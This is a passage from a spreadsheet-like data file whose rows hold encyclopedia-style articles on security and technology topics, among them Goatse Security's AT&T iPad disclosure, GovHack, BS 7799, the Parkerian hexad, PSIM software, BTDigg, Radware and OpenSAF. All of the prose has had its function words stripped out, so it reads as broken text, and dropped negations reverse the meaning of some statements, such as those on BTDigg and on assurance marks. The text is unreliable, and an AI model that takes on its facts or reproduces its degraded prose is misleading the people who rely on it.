problems. june 2010, auernheimer sent emails icc-ids recovered order verify claims. chat logs period also reveal attention publicity incentives group.contrary first claimed, group initially revealed security flaw gawker media notifying at&amp;t also exposed data 114,000 ipad users, including celebrities, government military. these tactics re-provoked significant debate proper disclosure security flaws.auernheimer maintained goatse security used common industry standard practices said that, tried good guys". jennifer granick electronic frontier foundation also defended tactics used goatse security.on june 2010, michael arrington techcrunch awarded group crunchie award public service. this first time crunchie awarded outside annual crunchies award ceremony.the opened investigation incident, leading criminal complaint january 2011 raid auernheimer's house. search related at&amp;t investigation auernheimer subsequently detained released bail state drug charges, later dropped. after release bail, broke order protest dispute legality search house denial access public defender. also asked donations paypal, defray legal costs. 2011 department justice announced charged count conspiracy access computer without authorization count fraud. co-defendant, daniel spitler, released bail.on november 2012, auernheimer found guilty count identity fraud count conspiracy access computer without authorization, tweeted would appeal ruling. alex pilosov, friend also present ruling, tweeted auernheimer would remain free bail sentencing, "which least days out."on november 2012, auernheimer authored article wired magazine entitled "forget disclosure hackers should keep security holes themselves," advocating disclosure zero-day exploit individuals "use interests social justice."on april 2014, third circuit issued opinion vacating auernheimer's conviction, basis venue jersey improper. judges address substantive question legality site access. released prison late april other accomplishments 2011, vulnerability affecting several linux distributions disclosed goatse security, group discovered lengthy advanced packaging tool would cause compiz crash.in september 2012, goatse security credited microsoft helping secure online services. references external links official website</t>
  </si>
  <si>
    <t>Gold Coast Techspace</t>
  </si>
  <si>
    <t>gold coast techspace hackerspace education centre focusing electronics, computer programming, printing. currently located mudgeeraba post office, mudgeeraba, gold coast, queensland, australia. gold coast techspace central component gold coast startup ecosystem sister relationship xinchejian, hackerspace shanghai, china. history space started group local technologists, lucas brandt, steven dalton nick byrne 2011. shortly acquiring first location johnston southport, gold coast techspace (gcts), incorporated queensland incorporated association (non-profit) operated since.for gold coast techspace also first coworking space gold coast gold coast co-working. coworking spaces emerged gold coast, gcts co-working space closed allow space focus core activities.over years gcts held participated number collaborative events encourage development technology local area, include gold coast science fair 2013 numerous barcamps; open, participatory meetup.com stylised workshop events designed provide representative stage potential technology ideas, demonstrations &amp;/or start-ups activities gold coast techspace instigator number technology related activities gold coast including: first gateway location gold coast's public access lpwan using things network barcamp gold coast also references external links gold coast techspace website gold coast techspace meetup group</t>
  </si>
  <si>
    <t>GovHack</t>
  </si>
  <si>
    <t>govhack australia's largest open government open data hackathon, attracting excess 1000 participants year. first small canberra-based event 2009, quickly expanded national competition simultaneous events taking place major cities across country year. available prizemoney similarly increased, total prize pool $70,000 available 2014. event requires small teams competitors produce kind "hack" using australian government data around hours, friday evening sunday afternoon. format "hack" unspecified, common applications, mobile applications, visualisations. together source code deposited open source repository open-licensed, team judged three-minute video must produce, demonstrating produced future potential. although competitors available open government data, certain prize categories mandate certain datasets, "best geoscience award" "best taxation statistics award". typically, participating government departments federal, state municipal release special datasets time competition year, associated prize.the event volunteers, particularly australian chapter open knowledge foundation, originally waugh, head national team. previous events govhack 2018 2018 event scheduled take place later year previous events, running september. govhack 2017 2017 event weekend 28–30 july. over 2,300 participants competed across locations, submitting projects. govhack 2016 2016, govhack weekend 29–31 july. over 3000 participants competed across locations, submitting projects. govhack 2015 2015 event july locations across australia zealand, attracting 1800 participants $120,000 prizes. govhack 2014 2014 event locations ballarat, brisbane, canberra, cairns, gold coast, hobart, melbourne, perth, sydney, adelaide gambier. winners national prizes flown special "red carpet" event brisbane august. govhack 2013 2013 event $170,000 prizemoney, teams entered, completed videos. external links data point (the blog) references</t>
  </si>
  <si>
    <t>Ubuntu Professional Certification</t>
  </si>
  <si>
    <t>ubuntu professional certification first introduced 2006, computer based examination ubuntu operating system. test administered (linux professional institute) certification part lpic (linux professional institute certification) added module/exam 117-101 117-102 certs. exam code 117-199. testee needed pass three exams (117-101,117-102 117-199) order receive certification. exams could taken exam(199). this certification discontinued october 2010. also linux professional institute certification references external links official ubuntu certified professional information ubuntu certified professional course objectives official ubuntu desktop training information google search certification answers</t>
  </si>
  <si>
    <t>Jeeney AI</t>
  </si>
  <si>
    <t>jeeney natural language processing chatterbot. history jeeny named "best overall bot" 2009 chatterbox challenge, ranking seventh, "best entry" previous year.jeeney modeled modified form plato's 'philosopher king' ideal, remains non-commercial application available users engage text-based interface. 2010 jeeney starred experimental documentary movie artificial insight. also list chatterbots references external links jeeney website</t>
  </si>
  <si>
    <t>Outbound content compliance</t>
  </si>
  <si>
    <t>outbound content compliance outbound content security relatively segment computer security field, aims detect prevent outbound content violates policy organization and/or government regulations. deals internal threats, opposite traditional security solutions (firewall, anti-virus, anti-spam etc.), dealing external threats. therefore, sometimes called inside-out security. business environment business environment, purpose prevent confidential and/or private data leaks. protected information belong company customers. canada, european countries enacted laws, mandating protection types computer-based information. some laws, including related provisions: sarbanes-oxley, hipaa, gramm-leach-bliley act. interest segment heated string high-profile data breaches, personal information millions people stolen endangered. also information leak prevention data loss prevention related terms information leak detection prevention outbound content monitoring inside-out security references</t>
  </si>
  <si>
    <t>OpenIDM</t>
  </si>
  <si>
    <t>openidm identity management system written java programming language. openidm source code available common development distribution license (cddl). openidm designed flexibility mind, leverages javascript default scripting language define business rules provisioning. capabilities openidm exposes restful interfaces. integration layer, openidm leverages identity connectors (adopted forgerock openicf) default connectors. july 2018 open source versions available download openidm website. 2016 copy source code available https://github.com/openrock/openidm/releases. history forgerock launched openidm project october 2010 goscon portland following 6-month internal development process.forgerock felt strong open source identity provisioning project, launched openidm cddl licensing compatibility openam opendj. however, giving access old, flattened x.0.0 source tree usually still contains many bugs, hardly described usually understood open source. since prevents community taking part developing within latest version trunk, give insights, actually fixed/features merged, considered closed source, (end 2016). full leveraging open source project identity connector framework microsystems integration layer resources, forgerock announced adopt project forming community around framework, name openicf.gartner identifies forgerock openidm interesting option many organizations seeking alternatives large vendors magic quadrant user administration/provisioning published december 2011.january 2012 forgerock announces openidm openidm.february 2013 forgerock announced openidm 2.1, part open identity stack latest stable release openidm.august 2014 forgerock announced openidm 3.0. roadmap forgerock posted openidm roadmap stretching release date 2012 also outlining project principles. openidm 1.0, launched october 2010. openidm 2.0, released january 2012 provided initial architecture, basic crud capabilities exposed rest password synchronization capabilities. openidm 2.1, focus workflow business process engine integration. openidm 2.2, expected introduce role based provisioning. references external links openidm project page openidm project wiki openidm source code browser</t>
  </si>
  <si>
    <t>BS 7799</t>
  </si>
  <si>
    <t>7799 standard originally published group (bsi) 1995. written united kingdom government's department trade industry (dti), consisted several parts. first part, containing best practices information security management, revised 1998; lengthy discussion worldwide standards bodies, eventually adopted iso/iec iso/iec 17799, "information technology code practice information security management." 2000. iso/iec 17799 revised june 2005 finally incorporated 27000 series standards iso/iec 27002 july 2007. second part 7799 first published 1999, known 7799 part titled "information security management systems specification guidance use." 7799-2 focused implement information security management system (isms), referring information security management structure controls identified 7799-2, later became iso/iec 27001. 2002 version 7799-2 introduced plan-do-check-act (pdca) (deming quality assurance model), aligning quality standards 9000. 7799 part adopted iso/iec 27001 november 2005. 7799 part published 2005, covering risk analysis management. aligns iso/iec 27001. revised 2017. also cyber security standards iso/iec 27000-series iso/iec 27001 iso/iec 27002 (formerly iso/iec 17799) references external links british standards institution shop certificate register 7799 part pdca methodology</t>
  </si>
  <si>
    <t>Parkerian Hexad</t>
  </si>
  <si>
    <t>parkerian hexad elements information security proposed donn parker 1998. parkerian hexad adds three additional attributes three classic security attributes triad (confidentiality, integrity, availability). parkerian hexad attributes following: confidentiality possession control integrity authenticity availability utilitythese attributes information atomic broken constituents; non-overlapping refer unique aspects information. information security breach described affecting fundamental attributes information. attributes triad confidentiality confidentiality refers limits kind information. example, executives concerned protecting enterprise's strategic plans competitors; individuals concerned unauthorized access financial records. integrity integrity refers correct consistent intended state information. unauthorized modification data, whether deliberate accidental, breach data integrity. example, data stored disk expected stable supposed changed random problems disk controller. similarly, application programs supposed record information correctly introduce deviations intended values. from donn parker: definition information integrity comes dictionaries. integrity means information whole, sound, unimpaired (not necessarily correct). means nothing missing information complete intended good order." author's statement comes close saying information correct...state. information incorrect authentic integrity correct authentic lacking integrity. availability availability means timely access information. example, disk crash denial-of-service attacks cause breach availability. delay exceeds expected service levels system described breach availability. parker's added attributes authenticity authenticity refers veracity claim origin authorship information. example, method verifying authorship hand written document compare handwriting characteristics document sampling others already verified. electronic information, digital signature could used verify authorship digital document using public-key cryptography (could also used verify integrity document). possession control possession control: suppose thief steal sealed envelope containing bank debit card personal identification number. even thief open envelope, reasonable victim concerned thief could time. that situation illustrates loss control possession information involve breach confidentiality. utility utility means usefulness. example, suppose someone encrypted data disk prevent unauthorized access undetected modifications–and lost decryption key: would breach utility. data would confidential, controlled, integral, authentic, available–they useful form. similarly, conversion salary data currency inappropriate currency would breach utility, would storage data format inappropriate specific computer architecture; e.g., ebcdic instead ascii 9-track magnetic tape instead dvd-rom. tabular representation data substituted graph could described breach utility substitution made difficult interpret data. utility often confused availability breaches described examples also require time work around change data format presentation. however, concept usefulness distinct availability. also triad references external links admissibility, authentication, authorization, availability, authenticity model http://veriscommunity.net/attributes.html nist special publication 800-33 underlying technical models information technology security, recommendations national institute standards technology further reading pender-bey, george. "the parkerian hexad, triad model expanded thesis" (pdf). parker, donn (1998). fighting computer crime. york, john wiley sons. isbn 0-471-16378-3. work parker introduced model. parker, donn (2002). "toward framework information security". bosworth, seymour; kabay, (eds.). computer security handbook (4th ed.). york, john wiley sons. isbn 0-471-41258-9.</t>
  </si>
  <si>
    <t>CESG Claims Tested Mark</t>
  </si>
  <si>
    <t>cesg claims tested mark (abbreviated mark cctm), formerly csia claims tested mark, government standard computer security. mark based upon framework vendors make claims security attributes products and/or services, independent testing laboratories evaluate products/services determine actually meet claims. words, mark provides quality assurance approach validate whether implementation computer security product services performed appropriate manner. history mark developed auspices government's central sponsor information assurance (csia), part cabinet office's intelligence, security resilience (isr) function. role providing specialist input mark fell cesg national technical authority (nta) information security, assumed responsibility scheme whole april 2008. operation testing laboratories must comply 17025, united kingdom accreditation service (ukas) carrying accreditation. comparisons mark often compared international common criteria (cc), simultaneously correct incorrect: both provide methods achieving measure assurance computer security products systems neither provide guarantee approval means exploitable flaws exist, rather reduce likelihood flaw present common criteria constructured layered manner, multiple evaluation assurance level (eal) specifications available increasing complexity, timescale costs number rises common criteria supported mutual recognition agreement (mra), which, lower numbers least, means products tested country normally accepted markets mark aimed market lower numbers (currently eal1/2), specifically designed timescale cost efficiency future september 2010, cesg announced product assurance element mark overtaken commercial product assurance (cpa) approach. unclear whether mark remain existence assurance information security services. external links official website cesg claims tested mark references</t>
  </si>
  <si>
    <t>CERT Coding Standards</t>
  </si>
  <si>
    <t>cert coding standards software coding standards developed cert coordination center improve safety, reliability, security software systems. individual standards offered c++, java, android perl.guidelines cert secure coding standard cross-referenced several standards including common weakness enumeration (cwe) entries misra. also common vulnerabilities exposures national vulnerability database references external links official website cert home page 2016 cert coding standard 2016 cert coding standard</t>
  </si>
  <si>
    <t>Physical security information management</t>
  </si>
  <si>
    <t>physical security information management (psim) category software provides platform applications created middleware developers, designed integrate multiple unconnected security applications devices control comprehensive user interface. collects correlates events existing disparate security devices information systems (video, access control, sensors, analytics, networks, building systems, etc.) empower personnel identify proactively resolve situations. psim integration enables numerous organizational benefits, including increased control, improved situation awareness management reporting. ultimately, solutions allow organizations reduce costs improved efficiency improve security increased intelligence. complete psim software system capabilities: collection: device management independent software collects data number disparate security devices systems. analysis: system analyzes correlates data, events, alarms, identify real situations priority. verification: psim software presents relevant situation information quick easily digestible format operator verify situation. resolution: system provides standard operating procedures (sops), step-by-step instructions based best practices organization’s policies, tools resolve situation. reporting: psim software tracks information steps compliance reporting, training potentially, in-depth investigative analysis. audit trail: psim also monitors operator interacts system, tracks manual changes security systems calculates reaction times event. psim-based integration differential psim based integration forms physical security system integration ability psim platform connect systems data level, contrasting forms integration interface limited number products. psim allows open technologies compatible large number manufacturers. these psim products offer opportunities expansion reduce implementation costs greater existing equipment. psim solutions general deployed centralize information single multiple control hubs. these referred control rooms command control centres (ccc, c4i, etc.). connected technologies, important feature basic psim capability integrate open industry standards (psia, onvif, odbc, etc.) security systems typically integrated psim solution include: access control systems automated barriers bollards building management systems like heating, hvac, lifts/elevators control, etc. cctv (closed circuit computer aided dispatch systems electronic article surveillance (eas) fire detection mapping systems intercom phone intrusion detection system intrusion systems lighting control system perimeter intrusion detection systems power monitoring system radar-based detection perimeter surveillance radar security alarm video content analysis video wall operator guidance psim solutions manage data produced various security applications (where security application manufacturers allows), aggregates produce meaningful intelligence. this turn converted create graphical situation management content; combining relevant visual intelligence, workflow based on-screen guidance automated tasks (also referred common operating interface). this used event management security operations. some advanced psim products offer dynamic guidance, changed according perceived threat level. this threat level governed external intelligence, advice internal intelligence, number attempted breaches. this level dynamic guidance relies level integration achieved given manufacturers sdk. typical deployments psim solutions found wide range industry government sectors across globe. following industries psim deployments found; corporate enterprise critical national infrastructure protection education energy, healthcare homeland defense industrial manufacturing enforcement retail distribution safe cities travel transportationexamples psim deployments: atlanta police foundation atlanta police department: operation shield video integration center british transport police city baltimore: citiwatch video surveillance program ventura police department: video camera community partnership program washington metropolitan area transit authority (wmata) convergence reason increased deployment technology ability bridge security information technology functions within organisations. security applications devices recently available proprietary technologies, reduce ability multiple vendors created vendor lock pricing strategies. this opposes standards, plug play technology allowed greater choice hardware helped reduce hardware costs. psim enables greater degree type interoperability, comes time security applications devices moving analogue network based connectivity. combined effect seen psim solutions score highly departments globally, especially database independent simple update devices users. security board level function security departments traditionally secure people buildings, slow absorb technology, relying manned guards physical barriers. enterprise risk management (erm) evolves address security legislative risks across stakeholders, physical security departments come increased scrutiny. numerous examples physical security breaches leading major organizational losses, terms assets brand damage physical security reporting board level. globally, roles created within large organizations chief information security officers (ciso), responsibility erm, including physical security. subsequently, management reporting, policy compliance kpis entered physical security function, requiring efficient working practices monitoring tools. again psim software addresses organizational requirements, therefore stipulated cisos. industry bodies open network video interface forum (onvif): open industry forum development global standard interface ip-based physical security products physical security interoperability alliance (psia): global consortium physical security manufacturers systems integrators focused promoting interoperability ip-enabled security devices security industry association: trade association electronic physical security solution providers foundation: interoperability standard secure reliable exchange data forum: advance adoption products services based session initiation protocol bacnet: data communication protocol building automation control networks references external links emea market: security evolves amid physical, cyber threats (asmag.com, 2017)[1] physical security collaboration: usual(securityinfowatch.com, 2016) managing mitigating business risk security software (securityinfowatch.com, 2015) mncs global security policies drive convergence (asmag.com, 2015) psim: critical element safe city program (asmag.com, 2015) news poll: psim definitions matter (security systems news, 2015) choose psim solution needs (ifsecglobal.com, 2015) psim gaining clout across world (qognify, 2015) timing everything: physical security information management (psim) (corporate techdecisions, 2014) security enhances metro emergency management (asmag.com, 2014) understanding “real” psim (asmag.com, 2014) crossing line security across transport sector (risk 2014, issue pages 20-21) managing security technology: should adopt psim? (campus safety magazine, 2014) special report: government security sharing video police (securityinfowatch.com, 2013 clearing confusion psim (securityinfowatch.com, 2010) physical security information management (psim): basics (cso online, 2010)</t>
  </si>
  <si>
    <t>Paris Blockchain Week Summit</t>
  </si>
  <si>
    <t>paris blockchain week summit first international conference crypto-assets blockchain. event showcases “the french regulatory framework ecosystem”, supported ministry economy finance (france). event headquartered france, conference speakers included draper emin sirer. also angie french tech michael amar references external links official homepage</t>
  </si>
  <si>
    <t>BTDigg</t>
  </si>
  <si>
    <t>btdigg first mainline search engine. participated bittorrent network, supporting network making correspondence magnet links torrent attributes (name, size, list files) indexed inserted database. users, btdigg provides full-text database search interface. part search system retrieved proper information user's text query. search supported queries european asian languages. project name acronym bittorrent digger context digger means treasure-hunter). went offline june 2016, reportedly index spam. site returned later 2016 dot-com domain, went offline online. btdig.com site torrent crawler's source code listed github, dhtcrawler2. features btdigg created search engine free content bittorrent network. part btdigg search system provides magnet links partial torrent information (name, list files, size) database. returned results based user's text query. btdigg's search engine links subjects partial information torrent magnet link, similar process linking content page page url. btdigg also provides third-party applications.btdigg interface supports english, russian, portuguese languages. users customize search results choosing proper sort order interface. additional features search api, popularity, plugins μtorrent qbittorrent clients, browser opensearch plugin (for internet explorer, google chrome). popularity gives picture changing popularity torrent bittorrent network. history btdigg btdigg founded nina evseenko january 2011. site also available network tor. march-april 2011, several features introduced, among plugin search click, qbittorrent plugin, showing torrent info-hash code picture, torrent fakes duplicates detection, charts popular torrents soft real-time. 2012, website started support connections. advantages disadvantages btdigg provides decentralization torrent index database creation, ability show distributed ratings provided users μtorrent. there guarantee content btdigg analyze store content. btdigg tracker participate coordinate bittorrent swarm. bittorrent index store maintain static list torrents. references</t>
  </si>
  <si>
    <t>Radware</t>
  </si>
  <si>
    <t>radware inc. american provider cybersecurity application delivery products physical, cloud software-defined data centers. radware's corporate headquarters located mahwah, jersey. company also offices europe, africa asia pacific regions. radware member group companies shares traded nasdaq. history radware co-founder zisapel served president, chief executive officer director since company's inception april 1997. 1999, company initial public offering listed nasdaq stock exchange. zisapel holds percent stake company. father, yehuda zisapel, largest shareholder, percent stake. acquisitions january 2019, radware expanded cloud security portfolio acquisition shieldsquare, market-leading management solutions provider. january 2017, radware acquired seculert, saas cloud-based provider protection enterprise network breach data exfiltration. february 2013, radware acquired strangeloop networks, leader performance optimization (wpo) solutions e-commerce enterprise applications. april 2007, radware acquired covelight systems, provider application auditing monitoring tools. february 2009, radware acquired nortel's application delivery business. november 2005, radware acquired v-secure technologies, leading provider behavioral-based network intrusion prevention products. products radware's products services include cloud services (cloud waf, cloud ddos protection, cloud workload protection, cloud acceleration, cloud malware protection, manager), application network security (defensepro, appwall, defenseflow), application delivery load balancing (alteon, appwall, fastview, appxml, linkproof ng), management monitoring (apsolute vision, mssp portal, application performance monitoring, vdirect). sales markets company sells products worldwide distributors resellers located americas, europe, middle east, africa asia pacific. customers include financial services, insurance, e-commerce, manufacturing, retail, government, healthcare, education, transportation services carriers. radware's 12,500 customers include switch, hexatom, quadranet, protonmail, convergys, singlehop, onlinetech, limelight networks, blackmesh brinkster. industry recognition most recently, radware awarded anti ddos vendor year frost sullivan's 2019 india awards positioned leader marketscape global ddos prevention. 2018, radware received several awards, including vendor year award (frost sullivan), cloud computing product year (tmc cloud computing magazine), fortress cyber security award (business intelligence group). also application delivery network security science technology israel references</t>
  </si>
  <si>
    <t>Wendy Seltzer</t>
  </si>
  <si>
    <t>wendy seltzer american attorney staff member world wide consortium, chair improving advertising business group. previously princeton's center information technology policy. seltzer also fellow harvard's berkman center internet society, founded leads lumen clearinghouse, aimed helping internet users understand rights response cease-and-desist threats related intellectual property legal demands.seltzer sits board directors world wide foundation. former at-large liaison icann board directors, advocated increased transparency organization increased protection privacy internet users. from april july 2007, visiting fellow oxford internet institute.previously, visiting assistant professor northeastern university school brooklyn school, fellow information society project yale school, served board directors project. before that, staff attorney electronic frontier foundation, specializing intellectual property free speech issues. seltzer a.b. harvard college j.d. harvard school. also perl programmer. publications "eff members build liberated tvs." deeplinks (may 2005). electronic frontier foundation. references external links official website profile berkman center internet society harvard university profile node.js interactivespeaking session: 11:20am, december 2019.profile oxford internet institute wendy seltzer's blog papers wendy seltzer ssrn digital liberation front broadcast flag electronic frontier foundation fulbright chair speaker series (mp3)</t>
  </si>
  <si>
    <t>XKMS</t>
  </si>
  <si>
    <t>management specification (xkms) uses services framework make easier developers secure inter-application communication using public infrastructure (pki). management specification protocol developed describes distribution registration public keys. services access xkms compliant server order receive updated information encryption authentication. architecture xkms consists parts: x-kiss information service specification x-krss registration service specificationthe x-krss defines protocols needed register public information. x-krss generate material, making recovery easier created manually. x-kiss outlines syntax applications delegate tasks needed process information element signature trust service. cases goal xkms allow complexity traditional implementations offloaded client external service. while approach originally suggested diffie hellman directions paper generally considered impractical time leading commercial development focusing certificate based approach proposed loren kohnfelder. development history team developed original xkms proposal submitted included warwick ford, phillip hallam-baker (editor) brian lamacchia. architectural approach closely related server originally created maintained brian lamacchia. realization closely related saml, first edition also edited hallam-baker. time xkms proposed security infrastructure defined entirely soap protocol services. result, large part xkms specification concerned definition security 'bindings' specific services protocols. also signature encryption, standards used xkms protocol. external links xkms sqldata xkms xkms entrust xkms markup security</t>
  </si>
  <si>
    <t>AS220</t>
  </si>
  <si>
    <t>as220 non-profit community arts center located downtown, providence, rhode island, united states. as220 maintains four dozen artist live/work studios, around dozen individual work studios, rotating exhibition spaces, main stage, black theater, dance studio, print shop, community darkroom, digital media lab, fabrication lab, organization-run restaurant, youth recording studio, youth program (as220 youth; formerly named broad street studio). as220 unjuried uncensored forum arts, open ages. history as220 founded 1985 umberto crenca, alongside susan clausen scott seabolt space artists performers exhibit work uncensored unjuried venue. umberto group artists frustrated conditions rhode island arts community made access success difficult outside rhode island school design initiatives backed local government. response, wrote manifesto formed as220 emphasis openness access. as220 began unofficial artists' space weybosset street downtown providence, providence performing arts center, incorporating address name. grew collection seven studios, gallery, performance stage expanded richmond street. 1992, as220 acquired 21,000 square foot building 95-121 empire street, renovated order create space mixed-use arts center including resident artists, performance space gallery, resident companies like groundwerx dance company perishable theater. development empire street facility credited part creation arts entertainment district providence. 2015, serving years artistic director, crenca transferred leadership role shey rivera ríos expansion 2000, as220 established broad street studio. between 2003 2006, launched capital campaign raised million improve empire street complex, including creation as220 restaurant.as220 purchased dreyfus hotel johnson wales university 2006. 24,000 square foot building corner washington mathewson street downtown providence, johnson wales university. opened 2007 upon completion renovations today home fourteen residential studios four work rental studios, as220 administrative offices, project space gallery.in june 2011, as220 opened newly renovated mercantile block building washington street downtown providence, purchased 2008. houses as220 industries, comprising as220 community printshop, as220 labs, as220 media arts. also includes live work artist studios, office space local non-profits, street-level retail space local businesses.as220 hosts bi-annual professional development program practice-practice arts administrators around country globally. creative placemaking as220 best known arts organization, also made impact city developer, occupying multiple buildings either uses purposes rents local artists, cultural institutions, small businesses, often market rate categorized affordable housing creative contributors. development organization served expand services also sustainability strategy, securing place arts artists city. national endowment arts described as220 organization "that anchors downtown arts entertainment district" played role city's "creative placemaking", process defined happening "partners public, private, non-profit, community sectors strategically shape physical social character neighborhood, town, city, region around arts cultural activities." programs facilities performance spaces main stage empire street location showcases 8-12 events week. it's best known music venue, though includes performance art, poetry slams, fashion shows, figure drawing, film screenings, cultural performances. as220 founded principles open access, serving place local artists, creative individuals, cultural groups. unusual open booking policy provide uncensored unjuried space artists. though frequently hosts acts states countries, prioritizes rhode island-based performers.as220 also enforces covers" policy, also implemented reaction trends area catered either national acts cover bands.in addition main space, empire street location also home experimental black theater dance studio. these spaces originated recurring performances luna loba series. galleries as220 includes gallery spaces. empire street complex houses youth gallery, open window, main gallery, occupies space main performance space. project space gallery located dreyfus building residents' gallery mote mercantile building. as220 youth as220 youth (formerly broad street studio) provides free arts education 14–21-year-olds, special focus youth care state rhode island training school. youth studio receives support americorps*vista program, public school system, local parents, providence health department, department children, youth, families. hosts multiple free workshops week creative writing, dance, music, visual arts, photography. annually, hosts interdisciplinary hip-hop performance series futureworlds. as220 industries as220 community printshop, fabrication lab, media arts facilities made available artists, makers, artisans, learners classes, training, reserved time, open access events. darkroom paul krot darkroom established 1994, along number photography classes programs later expanded include media arts. other media 1990s, as220 operated public access show named 220.in 1992, as220 released eponymous entitled compilation album, songs mostly recorded as220 order raise money organization. fest every summer, as220 hosts annual block party, "foo fest" (previously known "fool's ball"), 12-hour event including live music local regional bands national headliner, interactive installations, artist booths, rhode island mini maker fair, libertalia's anarchist bookfair. local arts organizations invited participate perform, past examples including girls rock providence city arts. notable performers fest include andrew w.k., warpaint, lightning bolt, deerhoof, psychic deacon, ssion, freedia. references further reading cook, greg august 2010). "as220 25". providence phoenix. archived original 2013. maxwell, kate (2006). constructing creative urban space development as220 providence, r.i. (thesis). brown university. external links official site fest</t>
  </si>
  <si>
    <t>OpenSAF</t>
  </si>
  <si>
    <t>opensaf (commonly styled saf, service availability framework) open-source service-orchestration system automating computer application deployment, scaling, management. opensaf consistent with, expands upon, service availability forum (saf) scope alliance standards.it originally designed motorola ecc, maintained opensaf project. opensaf complete implementation specifications, providing platform automating deployment, scaling, operations application services across clusters hosts. works across range virtualization tools runs services cluster, often integrating jvm, vagrant, and/or docker runtimes. opensaf originally interfaced standard application programming interfaces (apis), added java python bindings.opensaf focused service availability beyond high availability (ha) requirements. while little formal research published improve high availability fault tolerance techniques containers cloud, research groups actively exploring challenges opensaf. history opensaf founded industry consortium, including ericsson, nokia siemens networks, first announced motorola ecc, acquired emerson network power, february 2007. opensaf foundation officially launched january 2008. membership evolved include emerson network power, microsystems, enea, wind river, huawei, infusion, tail-f, aricent, goahead software, rancore technologies. goahead software joined opensaf 2010 acquired oracle. opensaf's development design heavily influenced mission critical system requirements, including carrier grade linux, saf, atca hardware platform interface. opensaf milestone accelerating adoption linux telecommunications embedded systems.the goal foundation accelerate adoption opensaf commercial products. opensaf community held conferences 2008-2010; first conference hosted nokia siemens networks munich (germany), second hosted huawei shenzhen (china), third hosted palo alto (usa). february 2010, first commercial deployment opensaf carrier networks announced. academic industry groups independently published books describing opensaf-based solutions. growing body research service availability accelerating development opensaf features supporting mission-critical cloud microservices deployments, service orchestration.opensaf released january 2008. comprised netplane core service (ncs) codebase contributed motorola ecc. along opensaf release, opensaf foundation incepted. opensaf released august 2008, first release developed opensaf community. this release included service 64-bit support. opensaf released june 2009, included platform management, usability improvements, java support.opensaf milestone release july 2010. nicknamed "architecture release", introduced significant changes including closing functional gaps, settling internal architecture, enabling in-service upgrade, clarify apis, improve modularity. receiving significant interest industry academics, opensaf held community conferences 2011, hosted university boston second hosted ericsson stockholm. concepts opensaf defines building blocks, collectively providing mechanism manage service availability (sa) applications based resource-capability models. high availability (ha) probability service available random point time; mission-critical systems require least 99.999% (five nines) availability. essentially same, goes (i.e. in-service upgrades hardware software). opensaf designed loosely coupled systems fast interconnections nodes (i.e. using tipc/tcp), extensible meet different workloads; components communicate using protocol. this extensibility provided large part api, used internal components core services. platform exert control compute storage resources defining objects, managed (component service) instances and/or node constraints.opensaf software distributed nature, following primary/replica architecture. `opensaf' cluster, types nodes divided manage individual node control plane. system controller runs "active" mode, another "standby" mode, remaining system controllers any) spares ready take active standby role case fault. nodes headless, without control plane, adding cloud resilience. system model opensaf system model enabler api, allowing opensaf process validate requests, update state objects model, allowing directors schedule workloads service groups across worker/payload nodes. behavior changed configuration object. services redundancy’, n+m, n-way, n-way active redundancy models. opensaf lacks obvious modeling toolchains simplify design generation configuration models. ongoing research address gap, needs deliver ecosystem tools, better support modeling automation carrier-grade cloud native computing foundation cases. control plane opensaf system controller (sc) main controlling unit cluster, managing workload directing communication across system. opensaf control plane consists various components, process, single node multiple nodes, supporting high-availability clusters service availability. various components opensaf control plane follows: information model manager (imm) persistent data store reliably stores configuration data cluster, representing overall state cluster given time. provides means define manage middleware application configuration state information form managed objects corresponding attributes. implemented in-memory database replicates data nodes. sqlite persistent backend. like apache zookeeper, guarantees transaction-level consistency configuration data availability/performance (see theorem). service follows three-tier opensaf "service director" framework, comprising director (immd), node director (immnd), agent library (imma). immd implemented daemon controllers using redundancy model, active controller instance "primary replica", standby controller instance kept up-to-date message based checkpointing service. immd tracks cluster membership (using mds), provides data store access control, administrative interface opensaf services availability management framework (amf) serves high availability workload management framework robust support conjunction services) full fault management lifecycle (detection, isolation, recovery, repair, notification). follows three-tier opensaf "service director", comprising director (amfd), node director (amfnd), agents (amfa), internal watchdog amfnd protection. active amfd service responsible realizing service configuration, persisted imm, across system/cluster scope. node directors perform function component within scope. ensures state models agreement acting main information bridge across components. monitors state, applying configuration changes simply restore divergences back "wanted configuration" using fault management escalation policies schedule creation wanted deployment. directors (amfd) schedulers decides nodes unscheduled service group redundant service instance) runs this decision based current v.s. "desired" availability capability models, service redundancy models, constraints quality-of-service, affinity/anti-affinity, etc. directors match resource "supply" workload "demand", behavior manipulated system object. component component logical entity system model represents normalized view computing resource processes, drivers, storage. components grouped logical service units (su), according fault inter-dependencies, associated node. instantiable unit workload controlled redundancy model, either active, standby, failed state. type grouped service groups (sg) exhibit particular redundancy modeling characteristics. within gets assigned service instances (si) given availability state active standby. si's scalable redundant logical services protected amf. node node compute instance blade, hypervisor, service instances (workload) deployed. nodes belonging communication subnet routing) comprise logical cluster. every node cluster must execution environment services, well opensaf services listed below: node director (amfnd): amfnd responsible running state node, ensuring active node healthy. takes care starting, stopping, maintaining csi, and/or organized directed control plane. amfnd service enforces desired configuration, persisted imm, node. when node failure detected, director (amfd) observes state change launches service unit another eligible healthy node. non-sa-aware component: opensaf provide (but instantiable components originating cloud computing, containerization, virtualization, domains, modeling component service lifecycle commands (start/stop/health check) model. container-contained: container-contained reside inside container-contained lowest level runtime instantiated. sa-aware container-contained component currently targets java virtual machine (jvm) jsr139. service unit basic scheduling unit opensaf service unit (su). grouping components. consists components guaranteed co-located node. assigned addresses default contain component does. administratively managed using object address. amfnd monitors state sus, desired state, re-deploys node possible. amfd start another node required redundancy model. define volume, local disk directory network disk, expose components su.[39] administratively managed cli, management delegated amf. such volumes also basis persistent storage. service group purpose service group maintain stable replica su's running given time. used guarantee availability specified number identical su's based selected configured redundancy model: n-way, n-way-active, n+m, 'no-redundancy'. grouping mechanism lets opensaf maintain number instances declared given definition identifies associated state (active, standby, failed). service instance opensaf service instance (si) work together, tier multi-tier application. protects service defined multi-instance (n-way-active, n-way, n+m) requires stable address, name, load balancer distribute traffic address among active (even failures cause su's move machine machine). default, service exposed inside cluster (e.g. su[typea] grouped requests su[typeb] load-balanced among them), service also exposed outside cluster (e.g., clients reach front-end sus). volumes filesystems available opensaf su's potentially ephemeral storage, default. node destroyed/recreated data lost node. solution network file system (nfs) shared storage, accessible payload nodes. other technical solutions possible important volumes (file share, mount point) modeled amf. highly available volumes provide persistent storage exists lifetime itself. this storage also used shared disk space within volumes mounted specific mount points node owned specific instance cannot shared using file system mount point. architecture opensaf architecture distributed runs cluster logical nodes. opensaf services either 3-tier 